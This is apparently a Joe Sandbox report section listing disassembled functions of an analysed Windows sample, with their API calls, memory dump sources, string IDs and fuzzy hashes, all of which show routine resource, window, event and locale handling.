                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                        • String ID: <3$<3
                                                                                                                                                                        • API String ID: 2962429428-260659822
                                                                                                                                                                        • Opcode ID: c5ab4c0a9c7d079fc3f84c8fcee9ee90db62fc535098bfde679f9b4c0bd48b16
                                                                                                                                                                        • Instruction ID: bd61b8fcf8d4c85f67cc0b97f6c2e11f2c1dd8653e281397a583a6c34b724118
                                                                                                                                                                        • Opcode Fuzzy Hash: c5ab4c0a9c7d079fc3f84c8fcee9ee90db62fc535098bfde679f9b4c0bd48b16
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D515730901A85CFE701CF69C948B4AFBF5EF49314F1482A9D455DB2A1EB34EA05CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C60280 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindResourceW.KERNEL32(00000000,?,00000017,1FC3D414,?,00E99310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00E99310), ref: 00C602C9
                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00E99310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00E99310,?), ref: 00C602D8
                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00E99310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00E99310,?), ref: 00C602E3
                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,00E99310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00E99310,?), ref: 00C602F4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                                                        • Opcode ID: 38035d052526fde8959bef15020b8a28ebeab0790223e5c8ce3b948e0ada797f
                                                                                                                                                                        • Instruction ID: d933a2476225e801270006af2df894134c505256687410089cf77d346696c69d
                                                                                                                                                                        • Opcode Fuzzy Hash: 38035d052526fde8959bef15020b8a28ebeab0790223e5c8ce3b948e0ada797f
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C31D171D057059BE7209F39DD45BABB7B8FF08B10F204629E865A7380EF309A08C7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCF120 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BCF169
                                                                                                                                                                        • GetParent.USER32(?), ref: 00BCF19D
                                                                                                                                                                          • Part of subcall function 00D7FA13: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00CF5F3E,?,?,?,?,?,?), ref: 00D7FA18
                                                                                                                                                                          • Part of subcall function 00D7FA13: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D7FA1F
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00BCF1D0
                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00BCF1E6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$HeapLong$AllocParentProcessShow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 78937335-0
                                                                                                                                                                        • Opcode ID: b375de48b08b936c47a66a8315ba0c6aca2db8f030ebcb369f2cf9c1024d5198
                                                                                                                                                                        • Instruction ID: 52cf7849a9e2c6e5ad9aa0b2af025b3dd2a33ec3a67895a8f2ec055f50d70368
                                                                                                                                                                        • Opcode Fuzzy Hash: b375de48b08b936c47a66a8315ba0c6aca2db8f030ebcb369f2cf9c1024d5198
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B2150746047029FC720DF29D844E2BBBE9FF49715B444A6EF49AD2662E730E808CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D05990 Relevance: 6.1, APIs: 4, Instructions: 62synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ResetEvent.KERNEL32(?,?,000003E8,00D04DC2,?,?,?,?,?,00000003,00000000,1FC3D414,?,000003E8), ref: 00D059A2
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000003E8,00D04DC2,?,?,?,?,?,00000003,00000000,1FC3D414,?,000003E8), ref: 00D059CF
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,?,000003E8,00D04DC2,?,?,?,?,?,00000003,00000000,1FC3D414,?,000003E8), ref: 00D05A05
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,?,000003E8,00D04DC2,?,?,?,?,?,00000003,00000000,1FC3D414,?,000003E8), ref: 00D05A28
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Event$ErrorLastObjectResetSingleWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 708712559-0
                                                                                                                                                                        • Opcode ID: 4c6c7dd72f181fe175c6b3c46a9946b8af20227f61a71d6c9a8411ab2a4a74bb
                                                                                                                                                                        • Instruction ID: c727c32ed437fc957fa601307601ede9f42c9b4e50e2abf5a762be8b36318d39
                                                                                                                                                                        • Opcode Fuzzy Hash: 4c6c7dd72f181fe175c6b3c46a9946b8af20227f61a71d6c9a8411ab2a4a74bb
                                                                                                                                                                        • Instruction Fuzzy Hash: 0E119431254F408EE7709B1AF984B577B95BF50324F08591EE487925A5C760FCC5CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D803FA Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SleepConditionVariableCS.KERNELBASE(?,00D80397,00000064), ref: 00D8041D
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E97DCC,?,?,00D80397,00000064,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414), ref: 00D80427
                                                                                                                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D80397,00000064,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414), ref: 00D80438
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E97DCC,?,00D80397,00000064,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?), ref: 00D8043F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3269011525-0
                                                                                                                                                                        • Opcode ID: 6be11563961f3fc5088b62c0063f3b066e757b5ee44d3b58e515b71843c70850
                                                                                                                                                                        • Instruction ID: 2a7f73c1ae8b140fc4ee3980fa3f07454bb5f4e734e2c2cb966907192949eb47
                                                                                                                                                                        • Opcode Fuzzy Hash: 6be11563961f3fc5088b62c0063f3b066e757b5ee44d3b58e515b71843c70850
                                                                                                                                                                        • Instruction Fuzzy Hash: C3E09231655625AFCE013F82ED089A93E28DF06751B040022F6CD72170CA62099C9BE5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D225A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenEventW.KERNEL32(00000000,00000000,1FC3D414,_pbl_evt,00000008,?,?,00E2B480,00000001,1FC3D414,00000000), ref: 00D2264E
                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 00D2266B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Event$CreateOpen
                                                                                                                                                                        • String ID: _pbl_evt
                                                                                                                                                                        • API String ID: 2335040897-4023232351
                                                                                                                                                                        • Opcode ID: 703073515fc01b93a2f9ec4f358e4d044ff500af5c51b1840fdb546dc7d1212d
                                                                                                                                                                        • Instruction ID: 716e6125a208961f7f03737bcdcc0da1e49ec3dd30b070b4dca10432638a0dd1
                                                                                                                                                                        • Opcode Fuzzy Hash: 703073515fc01b93a2f9ec4f358e4d044ff500af5c51b1840fdb546dc7d1212d
                                                                                                                                                                        • Instruction Fuzzy Hash: 5051A071D00218EFDB10DF68DC46BEEB7B8FB18714F108259E915B7290EB706A05CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00DA167C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00D9820D: RtlFreeHeap.NTDLL(00000000,00000000,?,00DA1120,?,00000000,?,?,00DA13C1,?,00000007,?,?,00DA1813,?,?), ref: 00D98223
                                                                                                                                                                          • Part of subcall function 00D9820D: GetLastError.KERNEL32(?,?,00DA1120,?,00000000,?,?,00DA13C1,?,00000007,?,?,00DA1813,?,?), ref: 00D9822E
                                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 00DA16C0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                        • String ID: XB$p@
                                                                                                                                                                        • API String ID: 4068849827-310831944
                                                                                                                                                                        • Opcode ID: e64291ad945d7b7141baa2b9aca11a4d0ffe5d7a6b14de439cd8ddb5de9b23e4
                                                                                                                                                                        • Instruction ID: 59f8e521058822598d66d2a053104cb5ace8d8015685035d515e8858049f952e
                                                                                                                                                                        • Opcode Fuzzy Hash: e64291ad945d7b7141baa2b9aca11a4d0ffe5d7a6b14de439cd8ddb5de9b23e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B312735601740DFEF21AF78D845F5A77E9EF02710F285929E0A9D71A1DF31A8809B74
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CD5040 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,1FC3D414,00E2A7FC), ref: 00CD50AC
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00CD51A3
                                                                                                                                                                          • Part of subcall function 00CC49B0: std::locale::_Init.LIBCPMT ref: 00CC4A8D
                                                                                                                                                                          • Part of subcall function 00CC2440: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CC2515
                                                                                                                                                                        Strings
                                                                                                                                                                        • Failed to get Windows error message [win32 error 0x, xrefs: 00CD50CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FormatFreeInitIos_base_dtorLocalMessagestd::ios_base::_std::locale::_
                                                                                                                                                                        • String ID: Failed to get Windows error message [win32 error 0x
                                                                                                                                                                        • API String ID: 1983821583-3373098694
                                                                                                                                                                        • Opcode ID: 38cfd381cea4e94fda00819569160c233cd21b79a57ca0f56258e96b21005e66
                                                                                                                                                                        • Instruction ID: 6d0ebf4a67bff3ec719346e9c088e9ed4f195f782455a0094d6106ad4ecf59ad
                                                                                                                                                                        • Opcode Fuzzy Hash: 38cfd381cea4e94fda00819569160c233cd21b79a57ca0f56258e96b21005e66
                                                                                                                                                                        • Instruction Fuzzy Hash: B741C370A017089FDB10DF58CD46BAEBBF8EF44314F204159E554A73D0EBB4AA48CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC38A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindow.USER32(00000002), ref: 00BC392B
                                                                                                                                                                        • IsWindow.USER32(00000002), ref: 00BC3942
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window
                                                                                                                                                                        • String ID: 0[
                                                                                                                                                                        • API String ID: 2353593579-255602147
                                                                                                                                                                        • Opcode ID: 9918b296047b3c2caa57fe41a0b628d3cb3fb249b2bd918768782b798d1bbdd8
                                                                                                                                                                        • Instruction ID: e9a2dfe764694c8951327798930f21172b193a77f5a8968747179e7c0cd6799d
                                                                                                                                                                        • Opcode Fuzzy Hash: 9918b296047b3c2caa57fe41a0b628d3cb3fb249b2bd918768782b798d1bbdd8
                                                                                                                                                                        • Instruction Fuzzy Hash: 21215570600B019FCB24DF65C855F6BBBF5FF44B11F008A6DE46A97AA0CB71AA04CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BF5730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00BF575B
                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BF57BE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                        • API String ID: 3988782225-1405518554
                                                                                                                                                                        • Opcode ID: 2f15275247495f1bdfb88234870f0ee723541b41799eb5082e042de278695762
                                                                                                                                                                        • Instruction ID: df3463a8915d047bbdb12407c8fab9b5389155c70aa2f5b85df10ef39e7bf69a
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f15275247495f1bdfb88234870f0ee723541b41799eb5082e042de278695762
                                                                                                                                                                        • Instruction Fuzzy Hash: A321E070A05B84DFD721CF68C804B9ABBF4EF15704F14869DE48997781D3B5AA08CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7D283 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualQuery.KERNEL32(80000000,00D7D1C8,0000001C,00D7D3BD,00000000,?,?,?,?,?,?,?,00D7D1C8,00000004,00E978D4,00D7D44D), ref: 00D7D294
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D7D1C8,00000004,00E978D4,00D7D44D), ref: 00D7D2AF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                                                                                                        • String ID: D
                                                                                                                                                                        • API String ID: 401686933-2746444292
                                                                                                                                                                        • Opcode ID: 17815dc42c934235ccee5372fb3a4a6edff9041d35b4804df576f0118ddc82a3
                                                                                                                                                                        • Instruction ID: d97b9a0c932d1c08454a8391a8a5008bc723ebdf215fbda9a9ed02d28525af5a
                                                                                                                                                                        • Opcode Fuzzy Hash: 17815dc42c934235ccee5372fb3a4a6edff9041d35b4804df576f0118ddc82a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 8901F732A001096FCB14DE69DC09BDD7BBAEFC4324F0CC124ED59E7151EA34D9068694
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC324B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • 4V, xrefs: 00BC328D
                                                                                                                                                                        • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BC3252
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ActiveWindow
                                                                                                                                                                        • String ID: 4V$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                                                                                                                                        • API String ID: 2558294473-3853628876
                                                                                                                                                                        • Opcode ID: 96a71d4d0a14e0e7d52943aa18e381e046e46583e016b51b26dd8062ff870884
                                                                                                                                                                        • Instruction ID: b2f547b0778871fa776ab72d5573b6f86ad0113a7c00daafefb5c2647ff944f9
                                                                                                                                                                        • Opcode Fuzzy Hash: 96a71d4d0a14e0e7d52943aa18e381e046e46583e016b51b26dd8062ff870884
                                                                                                                                                                        • Instruction Fuzzy Hash: D3115770905298DFCF01DBE4C958B9DBBB5AF99304F94809CD002AB285DBB45A08DB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

